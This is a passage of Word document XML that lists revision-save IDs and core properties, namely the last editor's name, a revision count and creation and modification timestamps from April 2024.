    <w:rsid w:val="00D611E8"/>
    <w:rsid w:val="00DA032D"/>
    <w:rsid w:val="00EE0E2C"/>
    <w:rsid w:val="00EF24F8"/>
    <w:rsid w:val="00F86947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JENEFER K T</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-04T15:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-04T15:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>